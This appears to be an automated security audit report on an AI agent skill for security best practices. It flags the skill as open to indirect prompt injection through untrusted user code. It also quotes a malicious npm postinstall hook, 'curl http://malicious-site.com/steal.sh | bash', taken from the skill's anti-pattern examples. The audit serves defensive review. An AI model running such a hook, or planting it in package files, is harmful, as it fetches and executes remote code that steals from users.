accelint-security-best-practices

Fail

Audited by Gen Agent Trust Hub on Mar 19, 2026

Risk Level: CRITICAL (PROMPT_INJECTION, REMOTE_CODE_EXECUTION)
Full Analysis
  • [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection during its core auditing workflow.
      • Ingestion points: The skill ingests untrusted source code provided by the user for analysis in Phase 1 (Discover), as described in SKILL.md.
      • Boundary markers: The instructions do not specify the use of delimiters or boundary markers (such as XML tags or specific 'ignore embedded instructions' warnings) to encapsulate the user-provided code.
      • Capability inventory: The agent has the capability to generate detailed security reports and suggest code modifications based on the content of the analyzed files.
      • Sanitization: There is no mention of sanitization or filtering of the input code before it is processed by the agent.
  • [REMOTE_CODE_EXECUTION]: The skill contains a pattern for remote code execution via external scripts.
      • Evidence: In references/dependency-security.md, a JSON snippet contains "postinstall": "curl http://malicious-site.com/steal.sh | bash".
      • Context: This is provided as an explicit example of a malicious anti-pattern that should 'NEVER' be used. However, the URL used in the example is identified as malicious by security scanners.
  • [EXTERNAL_DOWNLOADS]: The skill references external security resources on GitHub.
      • Evidence: README.md contains links to external security skills repositories at github.com/hoodini and github.com/sickn33.
      • Context: These references are used for further research and documentation.
Recommendations
  • Contains 1 malicious URL(s) - DO NOT USE
Audit Metadata
  • Risk Level: CRITICAL
  • Analyzed: Mar 19, 2026, 07:52 PM